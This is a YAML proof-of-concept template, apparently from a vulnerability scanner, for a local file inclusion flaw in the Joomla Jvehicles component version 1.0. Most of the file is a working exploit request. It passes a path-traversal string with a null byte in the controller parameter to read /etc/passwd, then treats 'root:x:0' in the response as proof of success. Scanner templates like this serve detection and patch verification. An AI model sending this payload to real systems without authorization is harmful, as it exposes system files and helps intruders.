product: Joomla
vName: Joomla jvehicles Component sef - Local File Inclusion
type: 文件读取
vID: [ ]
level: 3
vDesc: A local file inclusion vulnerability in the Jvehicles (com_jvehicles) component version 1.0 for Joomla! allows remote attackers to load arbitrary files via the controller parameter in index.php.
version: ''
note: ''
search: { }
protocol: http
link: https://www.exploit-db.com/exploits/11997
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00
    verify:
      logic: and
      check:
        - body:
            value:
              - 'root:x:0'
            logic: and
        - status: 200
